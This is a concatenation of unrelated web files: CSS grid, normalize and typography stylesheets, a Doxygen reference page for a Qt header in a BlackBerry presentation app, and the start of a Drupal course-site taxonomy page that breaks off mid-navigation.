58.33333333%; } .col-xs-6 { width: 50%; } .col-xs-5 { width: 41.66666667%; } .col-xs-4 { width: 33.33333333%; } .col-xs-3 { width: 25%; } .col-xs-2 { width: 16.66666667%; } .col-xs-1 { width: 8.33333333%; } .col-xs-pull-12 { right: 100%; } .col-xs-pull-11 { right: 91.66666667%; } .col-xs-pull-10 { right: 83.33333333%; } .col-xs-pull-9 { right: 75%; } .col-xs-pull-8 { right: 66.66666667%; } .col-xs-pull-7 { right: 58.33333333%; } .col-xs-pull-6 { right: 50%; } .col-xs-pull-5 { right: 41.66666667%; } .col-xs-pull-4 { right: 33.33333333%; } .col-xs-pull-3 { right: 25%; } .col-xs-pull-2 { right: 16.66666667%; } .col-xs-pull-1 { right: 8.33333333%; } .col-xs-pull-0 { right: auto; } .col-xs-push-12 { left: 100%; } .col-xs-push-11 { left: 91.66666667%; } .col-xs-push-10 { left: 83.33333333%; } .col-xs-push-9 { left: 75%; } .col-xs-push-8 { left: 66.66666667%; } .col-xs-push-7 { left: 58.33333333%; } .col-xs-push-6 { left: 50%; } .col-xs-push-5 { left: 41.66666667%; } .col-xs-push-4 { left: 33.33333333%; } .col-xs-push-3 { left: 25%; } .col-xs-push-2 { left: 16.66666667%; } .col-xs-push-1 { left: 8.33333333%; } .col-xs-push-0 { left: auto; } .col-xs-offset-12 { margin-left: 100%; } .col-xs-offset-11 { margin-left: 91.66666667%; } .col-xs-offset-10 { margin-left: 83.33333333%; } .col-xs-offset-9 { margin-left: 75%; } .col-xs-offset-8 { margin-left: 66.66666667%; } .col-xs-offset-7 { margin-left: 58.33333333%; } .col-xs-offset-6 { margin-left: 50%; } .col-xs-offset-5 { margin-left: 41.66666667%; } .col-xs-offset-4 { margin-left: 33.33333333%; } .col-xs-offset-3 { margin-left: 25%; } .col-xs-offset-2 { margin-left: 16.66666667%; } .col-xs-offset-1 { margin-left: 8.33333333%; } .col-xs-offset-0 { margin-left: 0; } @media (min-width: 768px) { .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9 { float: left; } .col-sm-12 { width: 100%; } .col-sm-11 { width: 91.66666667%; } .col-sm-10 { width: 83.33333333%; } .col-sm-9 { width: 75%; } .col-sm-8 { width: 66.66666667%; } .col-sm-7 { width: 58.33333333%; } .col-sm-6 { width: 50%; } .col-sm-5 { width: 41.66666667%; } .col-sm-4 { width: 33.33333333%; } .col-sm-3 { width: 25%; } .col-sm-2 { width: 16.66666667%; } .col-sm-1 { width: 8.33333333%; } .col-sm-pull-12 { right: 100%; } .col-sm-pull-11 { right: 91.66666667%; } .col-sm-pull-10 { right: 83.33333333%; } .col-sm-pull-9 { right: 75%; } .col-sm-pull-8 { right: 66.66666667%; } .col-sm-pull-7 { right: 58.33333333%; } .col-sm-pull-6 { right: 50%; } .col-sm-pull-5 { right: 41.66666667%; } .col-sm-pull-4 { right: 33.33333333%; } .col-sm-pull-3 { right: 25%; } .col-sm-pull-2 { right: 16.66666667%; } .col-sm-pull-1 { right: 8.33333333%; } .col-sm-pull-0 { right: auto; } .col-sm-push-12 { left: 100%; } .col-sm-push-11 { left: 91.66666667%; } .col-sm-push-10 { left: 83.33333333%; } .col-sm-push-9 { left: 75%; } .col-sm-push-8 { left: 66.66666667%; } .col-sm-push-7 { left: 58.33333333%; } .col-sm-push-6 { left: 50%; } .col-sm-push-5 { left: 41.66666667%; } .col-sm-push-4 { left: 33.33333333%; } .col-sm-push-3 { left: 25%; } .col-sm-push-2 { left: 16.66666667%; } .col-sm-push-1 { left: 8.33333333%; } .col-sm-push-0 { left: auto; } .col-sm-offset-12 { margin-left: 100%; } .col-sm-offset-11 { margin-left: 91.66666667%; } .col-sm-offset-10 { margin-left: 83.33333333%; } .col-sm-offset-9 { margin-left: 75%; } .col-sm-offset-8 { margin-left: 66.66666667%; } .col-sm-offset-7 { margin-left: 58.33333333%; } .col-sm-offset-6 { margin-left: 50%; } .col-sm-offset-5 { margin-left: 41.66666667%; } .col-sm-offset-4 { margin-left: 33.33333333%; } .col-sm-offset-3 { margin-left: 25%; } .col-sm-offset-2 { margin-left: 16.66666667%; } .col-sm-offset-1 { margin-left: 8.33333333%; } .col-sm-offset-0 { margin-left: 0; } } @media (min-width: 992px) { .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9 { float: left; } .col-md-12 { width: 100%; } .col-md-11 { width: 91.66666667%; } .col-md-10 { width: 83.33333333%; } .col-md-9 { width: 75%; } .col-md-8 { width: 66.66666667%; } .col-md-7 { width: 58.33333333%; } .col-md-6 { width: 50%; } .col-md-5 { width: 41.66666667%; } .col-md-4 { width: 33.33333333%; } .col-md-3 { width: 25%; } .col-md-2 { width: 16.66666667%; } .col-md-1 { width: 8.33333333%; } .col-md-pull-12 { right: 100%; } .col-md-pull-11 { right: 91.66666667%; } .col-md-pull-10 { right: 83.33333333%; } .col-md-pull-9 { right: 75%; } .col-md-pull-8 { right: 66.66666667%; } .col-md-pull-7 { right: 58.33333333%; } .col-md-pull-6 { right: 50%; } .col-md-pull-5 { right: 41.66666667%; } .col-md-pull-4 { right: 33.33333333%; } .col-md-pull-3 { right: 25%; } .col-md-pull-2 { right: 16.66666667%; } .col-md-pull-1 { right: 8.33333333%; } .col-md-pull-0 { right: auto; } .col-md-push-12 { left: 100%; } .col-md-push-11 { left: 91.66666667%; } .col-md-push-10 { left: 83.33333333%; } .col-md-push-9 { left: 75%; } .col-md-push-8 { left: 66.66666667%; } .col-md-push-7 { left: 58.33333333%; } .col-md-push-6 { left: 50%; } .col-md-push-5 { left: 41.66666667%; } .col-md-push-4 { left: 33.33333333%; } .col-md-push-3 { left: 25%; } .col-md-push-2 { left: 16.66666667%; } .col-md-push-1 { left: 8.33333333%; } .col-md-push-0 { left: auto; } .col-md-offset-12 { margin-left: 100%; } .col-md-offset-11 { margin-left: 91.66666667%; } .col-md-offset-10 { margin-left: 83.33333333%; } .col-md-offset-9 { margin-left: 75%; } .col-md-offset-8 { margin-left: 66.66666667%; } .col-md-offset-7 { margin-left: 58.33333333%; } .col-md-offset-6 { margin-left: 50%; } .col-md-offset-5 { margin-left: 41.66666667%; } .col-md-offset-4 { margin-left: 33.33333333%; } .col-md-offset-3 { margin-left: 25%; } .col-md-offset-2 { margin-left: 16.66666667%; } .col-md-offset-1 { margin-left: 8.33333333%; } .col-md-offset-0 { margin-left: 0; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9 { float: left; } .col-lg-12 { width: 100%; } .col-lg-11 { width: 91.66666667%; } .col-lg-10 { width: 83.33333333%; } .col-lg-9 { width: 75%; } .col-lg-8 { width: 66.66666667%; } .col-lg-7 { width: 58.33333333%; } .col-lg-6 { width: 50%; } .col-lg-5 { width: 41.66666667%; } .col-lg-4 { width: 33.33333333%; } .col-lg-3 { width: 25%; } .col-lg-2 { width: 16.66666667%; } .col-lg-1 { width: 8.33333333%; } .col-lg-pull-12 { right: 100%; } .col-lg-pull-11 { right: 91.66666667%; } .col-lg-pull-10 { right: 83.33333333%; } .col-lg-pull-9 { right: 75%; } .col-lg-pull-8 { right: 66.66666667%; } .col-lg-pull-7 { right: 58.33333333%; } .col-lg-pull-6 { right: 50%; } .col-lg-pull-5 { right: 41.66666667%; } .col-lg-pull-4 { right: 33.33333333%; } .col-lg-pull-3 { right: 25%; } .col-lg-pull-2 { right: 16.66666667%; } .col-lg-pull-1 { right: 8.33333333%; } .col-lg-pull-0 { right: auto; } .col-lg-push-12 { left: 100%; } .col-lg-push-11 { left: 91.66666667%; } .col-lg-push-10 { left: 83.33333333%; } .col-lg-push-9 { left: 75%; } .col-lg-push-8 { left: 66.66666667%; } .col-lg-push-7 { left: 58.33333333%; } .col-lg-push-6 { left: 50%; } .col-lg-push-5 { left: 41.66666667%; } .col-lg-push-4 { left: 33.33333333%; } .col-lg-push-3 { left: 25%; } .col-lg-push-2 { left: 16.66666667%; } .col-lg-push-1 { left: 8.33333333%; } .col-lg-push-0 { left: auto; } .col-lg-offset-12 { margin-left: 100%; } .col-lg-offset-11 { margin-left: 91.66666667%; } .col-lg-offset-10 { margin-left: 83.33333333%; } .col-lg-offset-9 { margin-left: 75%; } .col-lg-offset-8 { margin-left: 66.66666667%; } .col-lg-offset-7 { margin-left: 58.33333333%; } .col-lg-offset-6 { margin-left: 50%; } .col-lg-offset-5 { margin-left: 41.66666667%; } .col-lg-offset-4 { margin-left: 33.33333333%; } .col-lg-offset-3 { margin-left: 25%; } .col-lg-offset-2 { margin-left: 16.66666667%; } .col-lg-offset-1 { margin-left: 8.33333333%; } .col-lg-offset-0 { margin-left: 0; } } .container { padding-right: 12px; padding-left: 12px; } @media (min-width: 768px) { .container { padding-right: 24px; padding-left: 24px; } } @media (min-width: 992px) { .container { padding-right: 24px; padding-left: 24px; } } @media (min-width: 1200px) { .container { padding-right: 24px; padding-left: 24px; } } /*! _text-styling v2.0.1 */ /*! normalize.css v4.0.0 | MIT License | github.com/necolas/normalize.css */ /** * 1. Change the default font family in all browsers (opinionated). * 2. Prevent adjustments of font size after orientation changes in IE and iOS. */ html { font-family: sans-serif; /* 1 */ -ms-text-size-adjust: 100%; /* 2 */ -webkit-text-size-adjust: 100%; /* 2 */ } /** * Remove the margin in all browsers (opinionated). */ body { margin: 0; } /* HTML5 display definitions ========================================================================== */ /** * Add the correct display in IE 9-. * 1. Add the correct display in Edge, IE, and Firefox. * 2. Add the correct display in IE. */ article, aside, details, figcaption, figure, footer, header, main, menu, nav, section, summary { /* 1 */ display: block; } /** * Add the correct display in IE 9-. */ audio, canvas, progress, video { display: inline-block; } /** * Add the correct display in iOS 4-7. */ audio:not([controls]) { display: none; height: 0; } /** * Add the correct vertical alignment in Chrome, Firefox, and Opera. */ progress { vertical-align: baseline; } /** * Add the correct display in IE 10-. * 1. Add the correct display in IE. */ template, [hidden] { display: none; } /* Links ========================================================================== */ /** * Remove the gray background on active links in IE 10. */ a { background-color: transparent; } /** * Remove the outline on focused links when they are also active or hovered * in all browsers (opinionated). */ a:active, a:hover { outline-width: 0; } /* Text-level semantics ========================================================================== */ /** * 1. Remove the bottom border in Firefox 39-. * 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari. */ abbr[title] { border-bottom: none; /* 1 */ text-decoration: underline; /* 2 */ text-decoration: underline dotted; /* 2 */ } /** * Prevent the duplicate application of `bolder` by the next rule in Safari 6. */ b, strong { font-weight: inherit; } /** * Add the correct font weight in Chrome, Edge, and Safari. */ b, strong { font-weight: bolder; } /** * Add the correct font style in Android 4.3-. */ dfn { font-style: italic; } /** * Correct the font size and margin on `h1` elements within `section` and * `article` contexts in Chrome, Firefox, and Safari. */ h1 { font-size: 2em; margin: 0.67em 0; } /** * Add the correct background and color in IE 9-. */ mark { background-color: #ff0; color: #000; } /** * Add the correct font size in all browsers. */ small { font-size: 80%; } /** * Prevent `sub` and `sup` elements from affecting the line height in * all browsers. */ sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; } sub { bottom: -0.25em; } sup { top: -0.5em; } /* Embedded content ========================================================================== */ /** * Remove the border on images inside links in IE 10-. */ img { border-style: none; } /** * Hide the overflow in IE. */ svg:not(:root) { overflow: hidden; } /* Grouping content ========================================================================== */ /** * 1. Correct the inheritance and scaling of font size in all browsers. * 2. Correct the odd `em` font sizing in all browsers. */ code, kbd, pre, samp { font-family: monospace, monospace; /* 1 */ font-size: 1em; /* 2 */ } /** * Add the correct margin in IE 8. */ figure { margin: 1em 40px; } /** * 1. Add the correct box sizing in Firefox. * 2. Show the overflow in Edge and IE. */ hr { box-sizing: content-box; /* 1 */ height: 0; /* 1 */ overflow: visible; /* 2 */ } /* Forms ========================================================================== */ /** * Change font properties to `inherit` in all browsers (opinionated). */ button, input, select, textarea { font: inherit; } /** * Restore the font weight unset by the previous rule. */ optgroup { font-weight: bold; } /** * Show the overflow in IE. * 1. Show the overflow in Edge. * 2. Show the overflow in Edge, Firefox, and IE. */ button, input, select { /* 2 */ overflow: visible; } /** * Remove the margin in Safari. * 1. Remove the margin in Firefox and Safari. */ button, input, select, textarea { /* 1 */ margin: 0; } /** * Remove the inheritence of text transform in Edge, Firefox, and IE. * 1. Remove the inheritence of text transform in Firefox. */ button, select { /* 1 */ text-transform: none; } /** * Change the cursor in all browsers (opinionated). */ button, [type="button"], [type="reset"], [type="submit"] { cursor: pointer; } /** * Restore the default cursor to disabled elements unset by the previous rule. */ [disabled] { cursor: default; } /** * 1. Prevent a WebKit bug where (2) destroys native `audio` and `video` * controls in Android 4. * 2. Correct the inability to style clickable types in iOS. */ button, html [type="button"], [type="reset"], [type="submit"] { -webkit-appearance: button; /* 2 */ } /** * Remove the inner border and padding in Firefox. */ button::-moz-focus-inner, input::-moz-focus-inner { border: 0; padding: 0; } /** * Restore the focus styles unset by the previous rule. */ button:-moz-focusring, input:-moz-focusring { outline: 1px dotted ButtonText; } /** * Change the border, margin, and padding in all browsers (opinionated). */ fieldset { border: 1px solid #c0c0c0; margin: 0 2px; padding: 0.35em 0.625em 0.75em; } /** * 1. Correct the text wrapping in Edge and IE. * 2. Correct the color inheritance from `fieldset` elements in IE. * 3. Remove the padding so developers are not caught out when they zero out * `fieldset` elements in all browsers. */ legend { box-sizing: border-box; /* 1 */ color: inherit; /* 2 */ display: table; /* 1 */ max-width: 100%; /* 1 */ padding: 0; /* 3 */ white-space: normal; /* 1 */ } /** * Remove the default vertical scrollbar in IE. */ textarea { overflow: auto; } /** * 1. Add the correct box sizing in IE 10-. * 2. Remove the padding in IE 10-. */ [type="checkbox"], [type="radio"] { box-sizing: border-box; /* 1 */ padding: 0; /* 2 */ } /** * Correct the cursor style of increment and decrement buttons in Chrome. */ [type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { height: auto; } /** * Correct the odd appearance of search inputs in Chrome and Safari. */ [type="search"] { -webkit-appearance: textfield; } /** * Remove the inner padding and cancel buttons in Chrome on OS X and * Safari on OS X. */ [type="search"]::-webkit-search-cancel-button, [type="search"]::-webkit-search-decoration { -webkit-appearance: none; } .h1, h1 { font-size: 30px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 18px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h1, h1 { font-size: 36px; } } .h1.body-font, h1.body-font { font-weight: 700; } .h2, h2 { font-size: 24px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h2, h2 { font-size: 30px; } } .h2.body-font, h2.body-font { font-weight: 700; } .h3, h3 { font-size: 18px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h3, h3 { font-size: 24px; } } .h3.body-font, h3.body-font { font-weight: 700; } .h4, h4 { font-size: 16px; color: #4d5157; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h4, h4 { font-size: 18px; } } .h4.body-font, h4.body-font { font-weight: 700; } .h5, h5 { font-size: 16px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 6px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h5.body-font, h5.body-font { font-weight: 700; } .h6, h6 { font-size: 14px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 0px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h6.body-font, h6.body-font { font-weight: 700; } h1, h2, h3, h4, h5, h6 { line-height: 1.1; } /* * SETTINGS */ .h1, h1 { font-size: 30px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 18px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h1, h1 { font-size: 36px; } } .h1.body-font, h1.body-font { font-weight: 700; } .h2, h2 { font-size: 24px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h2, h2 { font-size: 30px; } } .h2.body-font, h2.body-font { font-weight: 700; } .h3, h3 { font-size: 18px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h3, h3 { font-size: 24px; } } .h3.body-font, h3.body-font { font-weight: 700; } .h4, h4 { font-size: 16px; color: #4d5157; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h4, h4 { font-size: 18px; } } .h4.body-font, h4.body-font { font-weight: 700; } .h5, h5 { font-size: 16px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 6px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h5.body-font, h5.body-font { font-weight: 700; } .h6, h6 { font-size: 14px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 0px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h6.body-font, h6.body-font { font-weight: 700; } html { font-size: 6px; } body { font-size: 14px; line-height: 1.428571429; color: #20262d; background-color: #f0f1f2; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } abbr[title] { cursor: help; border-bottom: 1px dotted #20262d; text-decoration: none; } address { font-style: normal; } blockquote { font-size: 16px; font-weight: 300; } mark { background-color: #f0ded7; } dl dt { font-weight: 700; } dl dd { margin: 0; } ::-moz-selection { background-color: #f0ded7; } ::selection { background-color: #f0ded7; } a { color: #b45c38; text-decoration: none; } a:hover, a:focus { color: #b45c38; text-decoration: underline; } a:focus { outline: none; color: #b45c38; } .is-keyboarduser a:focus { outline: 2px dotted #000; outline-offset: 0.5rem; } .is-keyboarduser a:focus { background-color: #fff; } a:hover { outline: none; background-color: transparent; } @media print { * { text-shadow: none !important; color: #000 !important; background: #fff !important; box-shadow: none !important; border-color: #000 !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; padding: 6px; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } p a { word-wrap: break-word; } select { background: #fff !important; } .container, .container-fluid { margin: auto; width: auto; } } /*!logos v2.0.1 BOM*/ /* * logos mixins * */ /* * SETTINGS */ .logo { display: inline-block; } .logo.logo-bom-shield { width: 26px; height: 44px; } .logo.logo-bom { width: 150px; height: 44px; } .logo.logo-bsa-stacked { width: 32px; height: 59px; } .logo.logo-bsa { width: 90px; height: 46px; } .logo.logo-bt-stacked { width: 73px; height: 70px; } .logo.logo-bt { width: 180px; height: 33px; } .logo.logo-stg-dragon { width: 54px; height: 43px; } .logo.logo-stg { width: 170px; height: 56px; } .logo.logo-wbc-live { width: 133px; height: 48px; } .logo.logo-wbc { width: 69px; height: 33px; } .logo.logo-wbg { width: 180px; height: 27px; }
Doc/Doxygen/html/clientserversharelib__global_8hpp.html
Schwane/EM2015_PraesiBert
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.10"/> <title>Präsibert: Common/ClientServerShareLib/include/clientserversharelib_global.hpp File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="navtree.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="resize.js"></script> <script type="text/javascript" src="navtreedata.js"></script> <script type="text/javascript" src="navtree.js"></script> <script type="text/javascript"> $(document).ready(initResizable); $(window).load(resizeHeight); </script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { init_search(); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectlogo"><img alt="Logo" src="logo.png"/></td> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">Präsibert &#160;<span id="projectnumber">1.0</span> </div> <div id="projectbrief">PräsiBert - eine Blackberry-Applikation für Präsentationen und Vorträge</div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.10 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>File&#160;Members</span></a></li> </ul> </div> </div><!-- top --> <div id="side-nav" class="ui-resizable side-nav-resizable"> <div id="nav-tree"> <div id="nav-tree-contents"> <div id="nav-sync" class="sync"></div> </div> </div> <div id="splitbar" style="-moz-user-select:none;" class="ui-resizable-handle"> </div> </div> <script type="text/javascript"> $(document).ready(function(){initNavTree('clientserversharelib__global_8hpp.html','');}); </script> <div id="doc-content"> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div class="header"> <div class="summary"> <a href="#define-members">Macros</a> </div> <div class="headertitle"> <div class="title">clientserversharelib_global.hpp File Reference</div> </div> </div><!--header--> <div class="contents"> <div class="textblock"><code>#include &lt;QtCore/qglobal.h&gt;</code><br /> </div> <p><a href="clientserversharelib__global_8hpp_source.html">Go to the source code of this file.</a></p> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="define-members"></a> Macros</h2></td></tr> <tr class="memitem:afbf515fa9176db7b23c5994964129f9c"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="clientserversharelib__global_8hpp.html#afbf515fa9176db7b23c5994964129f9c">CLIENTSERVERSHARELIB_EXPORT</a>&#160;&#160;&#160;Q_DECL_IMPORT</td></tr> <tr class="separator:afbf515fa9176db7b23c5994964129f9c"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> <h2 class="groupheader">Macro Definition Documentation</h2> <a class="anchor" id="afbf515fa9176db7b23c5994964129f9c"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define CLIENTSERVERSHARELIB_EXPORT&#160;&#160;&#160;Q_DECL_IMPORT</td> </tr> </table> </div><div class="memdoc"> <p>Definition at line <a class="el" href="clientserversharelib__global_8hpp_source.html#l00026">26</a> of file <a class="el" href="clientserversharelib__global_8hpp_source.html">clientserversharelib_global.hpp</a>.</p> </div> </div> </div><!-- contents --> </div><!-- doc-content --> <!-- start footer part --> <div id="nav-path" class="navpath"><!-- id is needed for treeview function! --> <ul> <li class="navelem"><a class="el" href="dir_1eb0ebf266b93c84d2dc0e6ce36fe1cd.html">Common</a></li><li class="navelem"><a class="el" href="dir_3741bf7d3b717efb72aa0e46cc188e02.html">ClientServerShareLib</a></li><li class="navelem"><a class="el" href="dir_d4e57c70483da450472ebc5b79308540.html">include</a></li><li class="navelem"><a class="el" href="clientserversharelib__global_8hpp.html">clientserversharelib_global.hpp</a></li> <li class="footer">Generated on Sat Aug 15 2015 18:59:05 for Präsibert by <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.10 </li> </ul> </div> </body> </html>
190-2006/taxonomy/term/558/index.html
kfitz/machines
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Tyra Banks is obnoxious | MS 190: Authorship</title> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="alternate" type="application/rss+xml" title="RSS - Tyra Banks is obnoxious" href="0/feed/index.html" /> <link rel="shortcut icon" href="../../../misc/favicon.ico" type="image/x-icon" /> <style type="text/css" media="all">@import "../../../modules/aggregator/aggregator.css";</style> <style type="text/css" media="all">@import "../../../modules/node/node.css";</style> <style type="text/css" media="all">@import "../../../modules/system/defaults.css";</style> <style type="text/css" media="all">@import "../../../modules/system/system.css";</style> <style type="text/css" media="all">@import "../../../modules/user/user.css";</style> <style type="text/css" media="all">@import "../../../sites/machines.pomona.edu.190-2006/themes/pushbutton/style.css";</style> </head> <body bgcolor="#ffffff"> <div class="hide"><a href="#content" title="Skip navigation." accesskey="2">Skip navigation</a>.</div> <table id="primary-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td id="home" width="10%"> <a href="../../../index.html" title="Home"><img src="../../../sites/machines.pomona.edu.190-2006/themes/pushbutton/logo.png" alt="Home" border="0" /></a> </td> <td id="site-info" width="20%"> <div class='site-name'><a href="../../../index.html" title="Home">MS 190: Authorship</a></div> </td> <td class="primary-links" width="70%" align="center" valign="middle"> <ul class="links"><li class="first menu-1-1-2"><a href="http://machines.plannedobsolescence.net" class="menu-1-1-2">kathleen fitzpatrick</a></li> <li class="last menu-1-2-2"><a href="http://sakai.claremont.edu/portal/site/CX_mtg_23932" class="menu-1-2-2">course sakai 